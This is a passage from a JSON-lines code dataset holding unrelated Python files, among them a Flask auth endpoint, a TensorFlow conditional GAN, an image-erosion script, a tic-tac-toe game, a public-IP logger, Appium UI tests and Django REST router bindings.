####\n################\n\n@doc(description='authentication repository', tags=['auth'])\nclass AuthApi(MethodResource):\n '''default auth class to handle rest API calls '''\n def post(self):\n args = auth_post_parser.parse_args()\n try:\n user = User.query.filter_by(email=args['Username']).one()\n except NoResultFound:\n abort(404)\n except Exception:\n abort(500)\n\n if user:\n if user.verify_password(args['Password']):\n if user.can(Permission.VIEW_API):\n token = user.generate_confirmation_token()\n return {\"token\": token.decode('UTF-8')}\n else: abort(403)\n else:\n abort(401)\n else:\n abort(404)","sub_path":"project/server/api/auth.py","file_name":"auth.py","file_ext":"py","file_size_in_byte":1177,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"30"} +{"seq_id":"243418175","text":"\"\"\"Posterior Inference with Conditional GAN\"\"\"\nimport os\nimport sys\nfrom arrows.config import floatX\nfrom tensorflow import Tensor\nimport tensorflow as tf\nfrom wacacore.train.common import (train_loop, updates, variable_summaries,\n setup_file_writers)\nfrom wacacore.util.io import handle_args\nfrom wacacore.util.generators import infinite_samples\nfrom wacacore.train.callbacks import every_n, summary_writes\nfrom 
wacacore.train.search import rand_local_hyper_search\nfrom typing import Generator, Callable, Sequence\nimport numpy as np\nfrom tflearn.layers import fully_connected\nfrom tflearn.layers.normalization import batch_normalization\n\n\ndef tf_cgan(x_prior: Tensor,\n            x_prior_gen: Generator,\n            z: Tensor,\n            z_gen: Generator,\n            f: Callable,\n            g: Callable,\n            disc: Callable,\n            options):\n    \"\"\"\n    Train a conditional random variable using a generative adversarial network\n    Args:\n        prior: Prior\n        prior_gen: Generator for the prior\n        pcrv_inp: Posterior Conditional Random Variable Inputs (placeholders)\n        pcrv_out: Posterior Conditional Random Variable Outputs X\n        discriminator: Tensor -> Tensor for discriminator function\n    \"\"\"\n    eps = 1e-6\n    # 1. Attach the prior to its generator\n    # Construct the two loss functions\n    y = f(x_prior)\n    x_fake = g(y, z)\n\n    # Pipe the output of cgan into discriminator\n    real = disc(x_prior, y, False) + eps\n    # Pipe output of prior into discriminator\n    fake = disc(x_fake, y, True) - eps\n\n    a = -tf.log(real) - tf.log(1 - fake)\n    loss_d = tf.reduce_mean(a)\n    b = -tf.log(fake)\n    loss_g = tf.reduce_mean(b)\n    losses = [loss_d, loss_g]\n\n    # Fetch\n    fetch = {'losses': {'x_fake':x_fake[0:5],\n                        'x_real':x_prior[0:5],\n                        'loss_d':loss_d,\n                        'loss_g':loss_g,\n                        'fake':fake[0:5],\n                        'real':real[0:5],\n                        'd_pre_mean': a[0:5],\n                        'g_pre_mean': b[0:5]}}\n    # fetch['check'] = tf.add_check_numerics_ops()\n    fetch['real'] = real[0]\n    fetch['fake'] = fake[0]\n\n    # 1st element from update is update tensor, 0th is optimizer\n    # Make loss updates from losses\n    g_vars = tf.get_collection(tf.GraphKeys.GLOBAL_VARIABLES, scope='generator')\n    d_vars = tf.get_collection(tf.GraphKeys.GLOBAL_VARIABLES,\n                               scope='discriminator')\n    loss_updates = []\n    loss_updates.append(updates(loss_d, d_vars, options)[1])\n    loss_updates.append(updates(loss_g, g_vars, options)[1])\n\n    # FIXME: Hyperparameterize this\n    # loss_ratios = [1, 3]\n    loss_ratios = None\n\n    def generator():\n        while True:\n            yield {x_prior: next(x_prior_gen),\n                   z: next(z_gen)}\n\n    train_generators = [generator()]\n\n\n    # Init\n    sess = tf.Session()\n    init = tf.initialize_all_variables()\n    sess.run(init)\n\n    # Reconstruction loss\n    y_recon = f(x_fake)\n    recon_loss = tf.reduce_mean(tf.abs(y_recon - y))\n    fetch['recon_loss'] = recon_loss\n\n    # Summaries\n    summaries = variable_summaries({'gen_loss': loss_g,\n                                    'disc_loss': loss_d,\n                                    'recon_loss': recon_loss})\n\n    ss = tf.summary.histogram(\"y_recon\", y_recon)\n    fetch['summaries'] = summaries\n    writers = setup_file_writers('summaries', sess)\n    options['writers'] = writers\n    callbacks = [every_n(summary_writes, 25)]\n\n    train_loop(sess,\n               loss_updates=loss_updates,\n               fetch=fetch,\n               train_generators=train_generators,\n               test_generators=None,\n               loss_ratios=loss_ratios,\n               test_every=100,\n               callbacks=callbacks,\n               **options)\n\n\ndef run(options):\n    \"\"\"Simple Example\"\"\"\n    # x, y sampled from normal distribution\n    batch_size = options['batch_size']\n    x_len = 1\n    # x_prior_gen = infinite_samples(lambda *shape: np.random.exponential(size=shape),\n    #                                shape=(x_len,),\n    #                                batch_size=batch_size,\n    #                                add_batch=True)\n    x_prior_gen = infinite_samples(lambda *shape: np.ones(shape=shape) * 0.5,\n                                   shape=(x_len,),\n                                   batch_size=batch_size,\n                                   add_batch=True)\n\n    x_prior = tf.placeholder(dtype=floatX(), shape=(batch_size, x_len))\n\n    def f(x):\n        \"\"\"The model\"\"\"\n        # return tf.reduce_sum(x, axis=1)\n        return x\n\n    z_len = 1\n    z = tf.placeholder(dtype=floatX(), shape=(batch_size, z_len))\n    # z_gen = 
infinite_samples(np.random.rand,\n # shape=(z_len,),\n # batch_size=batch_size,\n # add_batch=True)\n z_gen = infinite_samples(lambda *shape: np.ones(shape=shape) * 0.5,\n shape=(z_len,),\n batch_size=batch_size,\n add_batch=True)\n\n\n def g(y, z):\n \"\"\"Generator\"\"\"\n with tf.name_scope(\"generator\"):\n with tf.variable_scope(\"generator\"):\n # y = tf.expand_dims(y, 1)\n # inp = tf.concat([y, z], axis=1)\n inp = y\n inp = fully_connected(inp, 10, activation='elu')\n # inp = batch_normalization(inp)\n inp = fully_connected(inp, 10, activation='elu')\n # inp = batch_normalization(inp)\n inp = fully_connected(inp, x_len, activation='elu')\n # inp = batch_normalization(inp)\n return inp\n\n def g_pi(y, z):\n \"\"\"Parametric Inverse Generator\"\"\"\n with tf.name_scope(\"generator\"):\n with tf.variable_scope(\"generator\"):\n theta_len = 1\n # the neural network will take as input z, and output\n # the two parameters for\n inp = z\n inp = fully_connected(inp, 20, activation='elu')\n inp = batch_normalization(inp)\n inp = fully_connected(inp, 20, activation='elu')\n inp = batch_normalization(inp)\n theta = fully_connected(inp, theta_len, activation='elu')\n theta = batch_normalization(theta)\n x_1 = tf.expand_dims(y, 1) - theta\n x_2 = theta\n x = tf.concat([x_1, x_2], 1)\n return x\n\n def disc(x, y, reuse, use_y=False):\n \"\"\"Discriminator\"\"\"\n with tf.name_scope(\"discriminator\"):\n with tf.variable_scope(\"discriminator\", reuse=reuse):\n if use_y:\n inp = tf.concat([x, tf.expand_dims(y, 1)], 1)\n else:\n inp = x\n # import pdb; pdb.set_trace()\n # inp = fully_connected(inp, 3, activation='elu')\n out = fully_connected(inp, 1, activation='sigmoid')\n return out\n\n tf_cgan(x_prior,\n x_prior_gen,\n z,\n z_gen,\n f,\n g,\n disc,\n options)\n\n\ndef hyper_search():\n \"\"\"Do hyper parameter search for cgan\"\"\"\n options = {'update': 'adam',\n 'train': True,\n 'save': True,\n 'num_iterations': 10,\n 'save_every': 1000,\n 'learning_rate': 0.001,\n 'batch_size': [64, 128],\n 'datadir': os.path.join(os.environ['DATADIR'], \"rf\")}\n var_option_keys = ['batch_size']\n file_Path = os.path.abspath(__file__)\n rand_local_hyper_search(options, file_Path, var_option_keys, nsamples=2,\n prefix='cgan', nrepeats=1)\n\n\ndef default_options():\n \"Get default options for pdt training\"\n options = {}\n options['num_iterations'] = (int, 100)\n options['save_every'] = (int, 100)\n options['batch_size'] = (int, 512)\n options['gpu'] = (bool, False)\n options['dirname'] = (str, \"dirname\")\n options['datadir'] = (str, os.path.join(os.environ['DATADIR'], \"rf\"))\n return options\n\n\ndef main():\n if \"--hyper\" in sys.argv:\n hyper_search()\n else:\n cust_opts = default_options()\n options = handle_args(sys.argv[1:], cust_opts)\n if options['gpu']:\n print(\"Using GPU\")\n run(options)\n else:\n print(\"Using CPU\")\n with tf.device('/cpu:0'):\n run(options)\n\n\nif __name__ == \"__main__\":\n main()\n\n\n# TODO\n# Hyper parameterize the neural network architectures\n# Do hyperparameter search on openmind\n# So what it should be is that I add the tag --hyper_search\n","sub_path":"reverseflow/prob/cgan.py","file_name":"cgan.py","file_ext":"py","file_size_in_byte":8175,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"30"} +{"seq_id":"306320119","text":"#!/usr/bin/python3\nimport os\nimport sys\nimport argparse\nimport cv2\nimport numpy as np\n\nparser = argparse.ArgumentParser()\ngroup = parser.add_mutually_exclusive_group()\nif sys.stdin.isatty():\n 
parser.add_argument(\"img_path\", type=str)\nparser.add_argument(\"kernel\", type=int)\ngroup.add_argument(\"--append_dst\", type=str)\ngroup.add_argument(\"--normal_dst\", type=str)\nparser.add_argument(\"--cmd\", help=\"optional\", action=\"store_false\")\nparser.add_argument(\"--kernelX\", type=int)\nparser.add_argument(\"--kernelY\", type=int)\n\nargs = parser.parse_args()\nif hasattr(args, 'img_path'):\n img_path = args.img_path\nelse:\n img_path = sys.stdin.readline()[:-1]\n\nkernelX = kernelY = args.kernel\nkernelX = args.kernelX if args.kernelX else kernelX\nkernelY = args.kernelY if args.kernelY else kernelY\n\ncmd = bool(args.cmd)\nif args.normal_dst:\n dst_path = args.normal_dst\nelse:\n dst_name = os.path.basename(img_path)\n dst_folder = args.append_dst\n namelist = dst_name.split(\".\")\n dst_name = f'{\".\".join(namelist[0:-1])}-E({kernelX},{kernelY}).{namelist[-1]}'\n dst_path = dst_folder + dst_name\n\n\ndef stdout(msg, isinfo=True):\n if (cmd or isinfo) and not (cmd and isinfo):\n pass\n else:\n print(msg)\n\n\ndef main():\n kernel_in = (kernelX,kernelY)\n stdout(f'kernel:{kernel_in}\\n---start---')\n img = cv2.imread(img_path)\n stdout(f'{img_path} is loaded')\n kernel = np.ones(kernel_in, np.uint8)\n dst = cv2.erode(img, kernel, iterations=1)\n stdout('filter done')\n cv2.imwrite(dst_path, dst)\n stdout(f'output to {dst_path}')\n stdout('---end---')\n stdout(dst_path, False)\n\n\nif __name__ == '__main__':\n main()\n","sub_path":"Erosion.py","file_name":"Erosion.py","file_ext":"py","file_size_in_byte":1660,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"30"} +{"seq_id":"299951222","text":"def display_board(board):\n\t\n\tprint( \" \" + board[1] + \" | \" + board[2] + \" | \" + board[3])\n\tprint( \"----------\")\n\tprint( \" \" + board[4] + \" | \" + board[5] + \" | \" + board[6])\n\tprint( \"----------\")\n\tprint( \" \" + board[7] + \" | \" + board[8] + \" | \" + board[9])\n\ndef player_input():\n\n\twhile True:\n\t\n\t\ta= raw_input(\"player 1: choose your symbol [x/o] : \")\n\t\n\t\tst=['x','o']\n\t\tglobal p1\n\t\tglobal p2\n\t\tp1=''\n\t\tp2=''\n\t\tif a == 'x':\n\t\t\tp1=p1+a\n\t\t\tp2=p2+st[1]\n\t\t\tprint(\"player 1 is : {}\" .format(p1))\n\t\t\tprint(\"player 2 is : {}\" .format(p2))\n\t\t\tbreak\n\t\telif a == 'o':\n\t\t\tp1=p1+a\n\t\t\tp2=p2+st[0]\n\t\t\tprint(\"player 1 is : {}\" .format(p1))\n\t\t\tprint(\"player 2 is : {}\" .format(p2))\n\t\t\tbreak\n\t\t\n\t\telse:\n\t\t\tprint(\"wrong input!! choose between 2 symbols [x/o]! 
\")\n\t\t\tcontinue\n\n\t\t\ndef players(board):\n\tprint(\"iam from player function:\")\n\n\n\twhile True:\n\n\t\twhile True:\n\t\n\t\t\tpla1=int(input(\"player 1: enter yur choice of position : \"))\n\n\t\t\tif board[pla1]=='':\n\t\t\t\tboard[pla1]=p1\n\t\t\t\tbreak\n\t\t\telse:\n\t\t\t\tprint(\"entered position is occupied!!\")\n\t\t\t\tprint(\"choose someother position other than {} \".format(pla1))\n\t\t\t\tcontinue\n\t\tdisplay_board(board)\n\n\t\tif board[1]=='x' and board[2]=='x' and board[3]=='x':\n\t\t\tprint(board[1] ,\"wins !!\")\n\t\t\tbreak\n\t\tif board[4]=='x' and board[5]=='x' and board[6]=='x':\n\t\t\tprint(board[4] ,\"wins !!\")\n\t\t\tbreak\n\t\tif board[7]=='x' and board[8]=='x' and board[9]=='x':\n\t\t\tprint(board[7] ,\"wins !!\")\n\t\t\tbreak\n\t\tif board[1]=='x' and board[4]=='x' and board[7]=='x' :\n\t\t\tprint(board[1] ,\"wins !!\")\n\t\t\tbreak\n\t\tif board[2]=='x' and board[5]=='x' and board[8]=='x':\n\t\t\tprint(board[2] ,\"wins !!\")\n\t\t\tbreak\n\t\tif board[3]=='x' and board[6]=='x' and board[9]=='x':\n\t\t\tprint(board[3] ,\"wins !!\")\n\t\t\tbreak\n\t\tif board[1]=='x' and board[5]=='x' and board[9]=='x' :\n\t\t\tprint(board[1] ,\"wins !!\")\n\t\t\tbreak\n\t\tif board[3]=='x' and board[5]== 'x' and board[7]=='x':\n\t\t\tprint(board[3] ,\"wins !!\")\n\t\t\tbreak\n\t\tif board[1]=='o' and board[2]=='o' and board[3]=='o':\n\t\t\tprint(board[1] ,\"wins !!\")\n\t\t\tbreak\n\t\tif board[4]=='o' and board[5]=='o' and board[6]=='o':\n\t\t\tprint(board[4] ,\"wins !!\")\n\t\t\tbreak\n\t\tif board[7]=='o' and board[8]=='o' and board[9]=='o':\n\t\t\tprint(board[7] ,\"wins !!\")\n\t\t\tbreak\n\t\tif board[1]=='o' and board[4]=='o' and board[7]=='o' :\n\t\t\tprint(board[1] ,\"wins !!\")\n\t\t\tbreak\n\t\tif board[2]=='o' and board[5]=='o' and board[8]=='o':\n\t\t\tprint(board[2] ,\"wins !!\")\n\t\t\tbreak\n\t\tif board[3]=='o' and board[6]=='o' and board[9]=='o':\n\t\t\tprint(board[3] ,\"wins !!\")\n\t\t\tbreak\n\t\tif board[1]=='o' and board[5]=='o' and board[9]=='o' :\n\t\t\tprint(board[1] ,\"wins !!\")\n\t\t\tbreak\n\t\tif board[3]=='o' and board[5]== 'o' and board[7]=='o':\n\t\t\tprint(board[3] ,\"wins !!\")\n\t\t\tbreak\n\n\t\twhile True:\n\t\n\t\t\tpla2=int(input(\"player 2: enter yur choice of position : \"))\n\n\t\t\tif board[pla2]=='':\n\t\t\t\tboard[pla2]=p2\n\t\t\t\tbreak\n\t\t\telse:\n\t\t\t\tprint(\"entered position is occupied!!\")\n\t\t\t\tprint(\"choose someother position other than {} \".format(pla2))\n\t\t\t\tcontinue\n\t\tdisplay_board(board)\n\t\tcontinue\n\nprint(\"Welcome to the Tic Tac Toe game!!! 
\\n\")\nboard=['#','','','','','','','','','','']\n\ndisplay_board(board)\nplayer_input()\nplayers(board)\n\n\n\n\n\n\n\n\n\n","sub_path":"tictactoe.py","file_name":"tictactoe.py","file_ext":"py","file_size_in_byte":3110,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"30"} +{"seq_id":"409332132","text":"import requests\n\nu = requests.get('http://jsonplaceholder.typicode.com/users')\n\n\ndef pars(email):\n\n uj = u.json()\n resultStr = '' \n for i in uj: \n if email.lower() == i['email'].lower():\n for j in i:\n resultStr = '{} \\n {}'.format(resultStr, i[j])\n return resultStr;","sub_path":"testSite/parser.py","file_name":"parser.py","file_ext":"py","file_size_in_byte":318,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"30"} +{"seq_id":"596578793","text":"#!/usr/bin/env python \n# -*- coding:utf-8 -*-\n# __author__ = \"10291\"\n# 读取IP地址并保存到txt文件中\n\nimport os\nimport subprocess\nimport requests\nimport re\nimport time\nimport xgboost as xgb\n\n\ndef text_create(name, msg):\n desktop_path = \"C:\\\\Users\\\\10291\\\\OneDrive\\\\\" # 新创建的txt文件的存放路径\n full_path = desktop_path + name + '.txt' # 也可以创建一个.doc的word文档\n file = open(full_path, 'a')\n file.write(msg + \"\\n\")\n file.close()\n\n\ndef clear_txt():\n file = open(\"C:\\\\Users\\\\10291\\\\OneDrive\\\\dd.txt\", 'w')\n file.write('')\n file.close()\n\n\na = 0\nclear_txt()\nwhile True:\n a = a + 1\n text = requests.get('http://txt.go.sohu.com/ip/soip').text\n ip = re.findall(r'\\d+.\\d+.\\d+.\\d+', text)\n ip = ip[0]\n sysTime = time.strftime('%H:%M:%S', time.localtime(time.time()))\n print(sysTime)\n print(ip)\n text_create('dd', \"# \" + sysTime + \"\\n \" + ip)\n print(a)\n time.sleep(600*3)\n","sub_path":"cmd.py","file_name":"cmd.py","file_ext":"py","file_size_in_byte":957,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"30"} +{"seq_id":"309482352","text":"# -*- coding: utf-8 -*-\nfrom __future__ import unicode_literals\n\nfrom django.db import models, migrations\n\n\nclass Migration(migrations.Migration):\n\n dependencies = [\n ('main', '0006_auto_20151019_0144'),\n ]\n\n operations = [\n migrations.AddField(\n model_name='item',\n name='sex',\n field=models.SmallIntegerField(blank=True, null=True, verbose_name='Sex', choices=[(1, b'Male'), (2, b'Female')]),\n ),\n ]\n","sub_path":"apps/main/migrations/0007_item_sex.py","file_name":"0007_item_sex.py","file_ext":"py","file_size_in_byte":468,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"30"} +{"seq_id":"556292398","text":"#!/usr/bin/env python\n#encoding: utf-8\n\n\n\nimport time\nimport sys\nimport unittest\nimport traceback\nimport os\n\n\n\nsys.path.append('/jiaoben_z/initialization')\nsys.path.append('/jiaoben_z/Common/Test_Login')\n\nimport initialization\nfrom Common.Test_Login import User_Login\n\n\n\n\n\n\nclass TG_Banner(unittest.TestCase):\n def __init__(self, methodName):\n unittest.TestCase.__init__(self, methodName)\n print('************************** start test **************************')\n\n # 初始化操作\n\n def setUp(self):\n initialization.setUp(self)\n\n # 测试用例执行完成后的操作\n\n def tearDown(self):\n initialization.tearDown(self)\n\n\n\n def banner_jump(self):\n\n try:\n User_Login(self)\n time.sleep(3)\n\n self.driver.find_element_by_id('android:id/button1').click()\n time.sleep(1)\n self.driver.find_element_by_id('android:id/button1').click()\n time.sleep(2)\n\n # 多级目录截图\n foldname1 = time.strftime('%Y-%m-%d')\n\n 
dirname = os.path.join('/Users/zhulx/Documents/jiaoben_z/picture', foldname1)\n print(dirname)\n\n dirname2 = os.path.join(dirname, 'Test_banner')\n print(dirname2)\n\n if not os.path.exists(dirname):\n os.mkdir(dirname)\n\n if not os.path.exists(dirname2):\n os.mkdir(dirname2)\n\n\n else:\n self.driver.get_screenshot_as_file(dirname2 + '/' + time.strftime('%H:%M:%S') + '.png')\n\n\n\n # 媒资首页banner跳转\n\n\n for i in range(5):\n self.driver.get_screenshot_as_file(dirname2 + '/' + time.strftime('%H:%M:%S') + '.png')\n self.driver.find_element_by_id('com.modernsky.istv:id/banner').click()\n time.sleep(3)\n self.driver.get_screenshot_as_file(dirname2 + '/' + time.strftime('%H:%M:%S') + '.png')\n print('************ 跳转媒资首页banner详情 **************')\n self.driver.press_keycode(4)\n time.sleep(3)\n self.driver.swipe(824,424,156,612)\n time.sleep(3)\n\n # 票务首页banner跳转\n self.driver.find_element_by_id('com.modernsky.istv:id/mShop').click()\n print('*********** 跳转票务首页 *************')\n time.sleep(2)\n self.driver.get_screenshot_as_file(dirname2 + '/' + time.strftime('%H:%M:%S') + '.png')\n for i in range(8):\n self.driver.find_element_by_id('com.modernsky.istv:id/banner').click()\n time.sleep(2)\n self.driver.get_screenshot_as_file(dirname2 + '/' + time.strftime('%H:%M:%S') + '.png')\n print('************ 跳转票务首页banner详情 **************')\n self.driver.press_keycode(4)\n time.sleep(3)\n self.driver.swipe(824, 424, 156, 612)\n time.sleep(3)\n\n #商城首页banner跳转\n self.driver.tap([(306, 98), (426, 159)])\n print('*********** 跳转商城首页 *************')\n time.sleep(2)\n self.driver.get_screenshot_as_file(dirname2 + '/' + time.strftime('%H:%M:%S') + '.png')\n for i in range(8):\n self.driver.find_element_by_id('com.modernsky.istv:id/banner').click()\n time.sleep(2)\n self.driver.get_screenshot_as_file(dirname2 + '/' + time.strftime('%H:%M:%S') + '.png')\n print('************ 跳转商城首页banner详情 **************')\n self.driver.press_keycode(4)\n time.sleep(3)\n self.driver.swipe(824, 424, 156, 612)\n time.sleep(3)\n\n\n\n\n\n\n\n\n\n except Exception as err:\n traceback.print_exc()\n print(err)\n print(\"*******异常********\")\n","sub_path":"TestCase/Test_banner.py","file_name":"Test_banner.py","file_ext":"py","file_size_in_byte":3907,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"30"} +{"seq_id":"424943046","text":"answers = {'hello': \"Hi!\", 'how are you': 'Fine', 'bye': 'See you'}\n\ndef get_answer(question):\n return answers.get(question.lower(), 'Question is not found.')\n\n\ndef main():\n while True:\n question = input ('Enter question: ')\n if question.lower() != 'exit':\n print(get_answer(question))\n else:\n break\n\n\nif __name__ == '__main__':\n main()\n","sub_path":"Lesson01/week_01_08_task_2.py","file_name":"week_01_08_task_2.py","file_ext":"py","file_size_in_byte":389,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"30"} +{"seq_id":"142461299","text":"from . 
import helper\nfrom trpgcreator import config\n\n\nclass ResourceInfo:\n def __init__(self, name, folder, ext, default, create=True, subfolder=True, delete=True):\n self.name = name\n self.folder = folder\n self.ext = ext\n self.default = default\n self.create = create\n self.subfolder = subfolder\n self.delete = delete\n\n\n# \nability = ResourceInfo('ability', 'Abilities', '.abil',\n {})\n\nbuff = ResourceInfo('buff', 'Buffs', '.buff',\n {})\n\nenemy = ResourceInfo('enemy', 'Enemies', '.enem',\n {})\n\nfunction = ResourceInfo('function', 'Functions', '.func',\n '')\n\nitem = ResourceInfo('item', 'Items', '.item',\n {\n 'name': '',\n 'desc': '',\n 'value': 0,\n 'use': '',\n 'equip': None\n })\n\nperk = ResourceInfo('perk', 'Perks', '.perk',\n {})\n\nres_stat = ResourceInfo('resource stat', 'Stats-Resource', '.reso',\n {\n 'name': '',\n 'desc': ''\n },\n subfolder=False)\n\nother_stat = ResourceInfo('other stat', 'Stats-Other', '.othr',\n {\n 'name': '',\n 'desc': ''\n },\n subfolder=False)\n\nhealth_stat = ResourceInfo('health stat', 'Stats-Health', '.hlth',\n {\n 'name': 'Health',\n 'desc': 'Health is what keeps you alive.'\n },\n create=False, delete=False, subfolder=False)\n\nscenario = ResourceInfo('scenario', 'Scenarios', '.scen',\n {\n 'name': '',\n 'desc': '',\n 'options': []\n })\n\nshop = ResourceInfo('shop', 'Shops', '.shop',\n {})\n\nall_info = [\n # ability,\n # buff,\n # enemy,\n function,\n item,\n # perk,\n res_stat,\n other_stat,\n health_stat,\n scenario,\n # shop\n]\n# \n\nfolders = list(map(lambda r: r.folder, all_info))\n\n# Yes, this is ugly. But it's the easiest way to convert from available data to other needed data.\next_to_name = {resource.ext: resource.name for resource in all_info}\nfolder_to_name = {resource.folder: resource.name for resource in all_info}\nfolder_to_ext = {resource.folder: resource.ext for resource in all_info}\nname_to_default = {resource.name: resource.default for resource in all_info}\nfolder_to_object = {resource.folder: resource for resource in all_info}\next_to_object = {resource.ext: resource for resource in all_info}\n\n\ndef create_config_files(directory, campaign_name):\n # /.settings\n settings_dir = directory + '/.settings'\n player_data = {\n 'scenario': 'start',\n 'stats': {\n 'health': {},\n 'resource': {},\n 'other': {}\n },\n 'inventory': {\n 'currency': 0,\n 'items': {}\n }\n }\n export_data = {\n 'name': campaign_name,\n 'creator': config.get('default_creator'),\n 'about': ''\n }\n helper.save_json_data(settings_dir + '/std/player.json', player_data)\n helper.save_json_data(settings_dir + '/debug/player.json', player_data)\n helper.save_json_data(settings_dir + '/std/globals.json', {})\n helper.save_json_data(settings_dir + '/debug/globals.json', {})\n helper.save_json_data(settings_dir + '/export.json', export_data)\n","sub_path":"trpgcreator/misc/resource.py","file_name":"resource.py","file_ext":"py","file_size_in_byte":3791,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"30"} +{"seq_id":"617872203","text":"import datetime\nimport re\nfrom time import gmtime, strftime\nfrom threading import Timer\nfrom datetime import datetime, timedelta\n\n\nclass Scheduler:\n\n rgx = None\n settings = None\n db_config = None\n task_settings = None\n task = None\n\n def __init__(self, config):\n\n self.settings = config['MAIN']\n self.db_config = config['DATABASE']\n\n self.rgx = re.compile(r\"^0\", re.IGNORECASE)\n\n # convert interval from minutes to seconds, and delete first 0 fom start_time\n 
self.task_settings = {\n \"interval\": int(self.settings['interval']) * 60,\n \"start_time\": int(re.sub(self.rgx, \"\", self.settings['start_time']))\n }\n\n if self.settings.getboolean('debug'):\n print(\"Interval: %s\" % self.task_settings['interval'])\n\n if self.task_settings['start_time'] == 0:\n self.task_settings['start_time'] = 60\n\n if self.settings.getboolean('debug'):\n print(\"Start time: %s\" % self.task_settings['start_time'])\n\n def start(self):\n if self.task is not None:\n self.task.start()\n\n def test(self):\n\n print(strftime(\"%Y-%m-%d %H:%M:%S\", gmtime()))\n self.create()\n\n def create(self, task):\n\n current_timestamp = datetime.today()\n\n if self.settings.getboolean('debug'):\n print(\"Current Time: %s\" % current_timestamp)\n\n schedule_time = current_timestamp.replace(second=0, microsecond=0)\n\n minutes = self.task_settings['start_time'] - schedule_time.minute % self.task_settings['start_time']\n\n if minutes == 0:\n minutes = self.task_settings['start_time']\n\n schedule_time = schedule_time + timedelta(minutes=minutes)\n\n if self.settings.getboolean('debug'):\n print(\"Schedule Time: %s\" % schedule_time)\n\n delta_t = schedule_time - current_timestamp\n delay = delta_t.seconds + 1\n\n if self.settings.getboolean('debug'):\n print(\"Time delta: %s\" % delay)\n\n self.task = Timer(delay, task, [self])\n\n\n","sub_path":"classes/Scheduler.py","file_name":"Scheduler.py","file_ext":"py","file_size_in_byte":2051,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"30"} +{"seq_id":"562627486","text":"from django.urls import include, path\nfrom rest_framework import routers\nfrom . import views\nfrom .views import StudentViewSet,UserViewSet,ProfessorViewSet,AdminViewSet,CourseViewSet,SectionViewSet,AnnouncementViewSet,AssignmentViewSet,EnrollmentViewSet,StudentAssignmentViewSet\nfrom rest_framework import renderers\n\n\n\n\n\n#Binding ViewSets to URLs explicitly\n\nstudent_list = StudentViewSet.as_view({\n 'get': 'list',\n 'post': 'create'\n})\n\nstudent_detail = StudentViewSet.as_view({\n 'get': 'retrieve',\n 'put': 'update',\n 'patch': 'partial_update',\n 'delete': 'destroy'\n})\n\nprofessor_list =ProfessorViewSet.as_view({\n 'get': 'list',\n 'post': 'create'\n})\n\nprofessor_detail =ProfessorViewSet.as_view({\n 'get': 'retrieve',\n 'put': 'update',\n 'patch': 'partial_update',\n 'delete': 'destroy'\n})\n\n\nstudent_highlight =StudentViewSet.as_view({\n 'get': 'highlight'\n}, renderer_classes=[renderers.StaticHTMLRenderer])\n\nprofessor_highlight =ProfessorViewSet.as_view({\n 'get': 'highlight'\n}, renderer_classes=[renderers.StaticHTMLRenderer])\n\nadmin_list =AdminViewSet.as_view({\n 'get': 'list',\n 'post': 'create'\n})\n\nadmin_detail = AdminViewSet.as_view({\n 'get': 'retrieve',\n 'put': 'update',\n 'patch': 'partial_update',\n 'delete': 'destroy'\n})\nadmin_highlight = AdminViewSet.as_view({\n 'get': 'highlight'\n}, renderer_classes=[renderers.StaticHTMLRenderer])\n\ncourse_list =CourseViewSet.as_view({\n 'get': 'list',\n 'post': 'create'\n})\n\ncourse_detail =CourseViewSet.as_view({\n 'get': 'retrieve',\n 'put': 'update',\n 'patch': 'partial_update',\n 'delete': 'destroy'\n})\n\ncourse_highlight =CourseViewSet.as_view({\n 'get': 'highlight'\n}, renderer_classes=[renderers.StaticHTMLRenderer])\n\n\n\nsection_list =SectionViewSet.as_view({\n 'get': 'list',\n 'post': 'create'\n})\n\nsection_detail = SectionViewSet.as_view({\n 'get': 'retrieve',\n 'put': 'update',\n 'patch': 'partial_update',\n 'delete': 
'destroy'\n})\n\nsection_highlight =SectionViewSet.as_view({\n    'get': 'highlight'\n},\n    renderer_classes=[renderers.StaticHTMLRenderer])\n\n\n\n\nannouncement_list =AnnouncementViewSet.as_view({\n    'get': 'list',\n    'post': 'create'\n})\n\nannouncement_detail =AnnouncementViewSet.as_view({\n    'get': 'retrieve',\n    'put': 'update',\n    'patch': 'partial_update',\n    'delete': 'destroy'\n})\n\nannouncement_highlight =AnnouncementViewSet.as_view({\n    'get': 'highlight'\n},\n    renderer_classes=[renderers.StaticHTMLRenderer])\n\n\n\n\n\n\nassignment_list =AssignmentViewSet.as_view({\n    'get': 'list',\n    'post': 'create'\n})\n\nassignment_detail =AssignmentViewSet.as_view({\n    'get': 'retrieve',\n    'put': 'update',\n    'patch': 'partial_update',\n    'delete': 'destroy'\n})\n\nassignment_highlight =AssignmentViewSet.as_view({\n    'get': 'highlight'\n},\n    renderer_classes=[renderers.StaticHTMLRenderer])\n\n\n\nenrollment_list =EnrollmentViewSet.as_view({\n    'get': 'list',\n    'post': 'create'\n})\n\nenrollment_detail =EnrollmentViewSet.as_view({\n    'get': 'retrieve',\n    'put': 'update',\n    'patch': 'partial_update',\n    'delete': 'destroy'\n})\n\nenrollment_highlight =EnrollmentViewSet.as_view({\n    'get': 'highlight'\n},\n    renderer_classes=[renderers.StaticHTMLRenderer])\n\n\n\nstudentAssignment_list =StudentAssignmentViewSet.as_view({\n    'get': 'list',\n    'post': 'create'\n})\n\nstudentAssignment_detail =StudentAssignmentViewSet.as_view({\n    'get': 'retrieve',\n    'put': 'update',\n    'patch': 'partial_update',\n    'delete': 'destroy'\n})\n\nstudentAssignment_highlight =StudentAssignmentViewSet.as_view({\n    'get': 'highlight'\n},\n    renderer_classes=[renderers.StaticHTMLRenderer])\n\n\n\n\n\nuser_list = UserViewSet.as_view({\n    'get': 'list'\n})\nuser_detail = UserViewSet.as_view({\n    'get': 'retrieve'\n})\n\n\n# Routers provide an easy way of automatically determining the URL conf\n# 